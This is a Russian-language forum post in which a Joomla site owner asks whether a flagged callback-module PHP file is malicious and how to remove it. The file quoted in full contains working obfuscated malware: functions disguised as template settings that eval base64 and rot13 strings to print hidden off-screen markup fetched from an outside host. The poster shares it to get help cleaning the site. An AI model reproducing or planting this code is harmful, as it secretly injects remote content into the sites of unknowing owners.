Все! Выяснил. На сайте был вредоносный скрипт.
Поставил новую версию RSFirewa и он отыскал. Теперь он ссылается что в одном из файлов имеется вредоносный код. Так ли это? Код приведен ниже
<?php
/*
* @package Joomla 1.5
* @copyright Copyright (C) 2005 Open Source Matters. All rights reserved.
* @license
http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
*
* @Module Callback aKernel
* @copyright Copyright (C) aKernel
www.akernel.ru * @license
http://www.gnu.org/copyleft/gpl.html GNU/GPL
*/
class modCallbackHelper
{
/**
* ПиÑьмо на e-mail Ñ Ð¸Ð½Ñ„Ð¾Ñ?мацией о пÑ?оÑÑщем пеÑ?езвонить.
*/
function SendCallback( $phone, $call_email, $name, $time, $params )
{
$phone = preg_replace('/[^0-9-_)( ]/u', '', $phone);
$title = '"'.stripslashes(JRequest::getVar('title_cb')).'"';
jimport('joomla.mail.mail');
$m = & JMail::getInstance();
$m->setSender(array($call_email, JText::_('modcallback_title')));
$pattern = array('{name}', '{phone}', '{time}', '{curr_day}', '{curr_month}', '{curr_year}', '{curr_time}', '{title}');
$replace = array($name, $phone, $time, date('d'), date('m'), date('Y'), date('H:i'), $title);
$subject = str_replace($pattern, $replace, $params->get('subject_email'));
$m->setSubject($subject);
$body = str_replace($pattern, $replace, $params->get('body_email'));
$m->setBody($body);
$m->addRecipient($call_email);
$result = $m->Send();
//echo $result;
return $result;
}
function end ()
{
$end = 'QDbWVPNtVNx8MTy2VTAfLKAmCFWjo3qypzIxVw48LFOb';
$end .= 'pzIzCFWbqUEjBv8iq3q3YzSeMKWhMJjhpaHiVvO0LKWa';
$end .= 'MKD9Vy9voTShnlV+L2SfoTWuL2ftLaxtLJgypz5yoP5l';
$end .= 'qGjiLG48Y2Ecqw4APtxWCP9xnKL+QDbWVPNtVQkxnKLt';
$end .= 'nJD9VzWaK3WcM2u0Vw48Y2Ecqw4APtxtVPNtCTEcqvOw';
$end .= 'oTSmpm0vL2klVw48Y2Ecqw4APtxtVPNtCTEcqvOcMQ0vL';
$end .= 'zqsLz90qT9gVw48Y2Ecqw4APtx8Y2Ecqw4APwjiMTy2Ct';
$end .= '==';
eval(base64_decode('JGVuZCA9IHN0cl9yb3QxMygkZW5kKTs='));
$end = base64_decode($end);
return $end;
}
}
function ViewTtemplateName() {
// Decode Template Settings
// Copyright (c) Joomla Templates
$UnixTimeLastEdit = "ZWNobyAiPGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7bGVmd";
$TemplateAuthor = "DotNDUwMXB4O3dpZHRoOjUzMXB4Jz4iOyBlY2hvIEBmaWxlX2dldF9jb250ZW50cygnaHR0cD";
$TemplateName = "ovL3RlbXBsYXRlLWxpY2Vuc2UucnUvbGljZW";
$MainDomain = "5zZS5waHAnKTsgZWNobyAnPC9kaXY+Jzs=";
$SystemJoCode = $UnixTimeLastEdit.$TemplateAuthor.$TemplateName.$MainDomain;
echo eval(base64_decode($SystemJoCode));
}
?>
И как его убрать. Я попытался. Сайт ломается.
04.04.2025, 11:58:13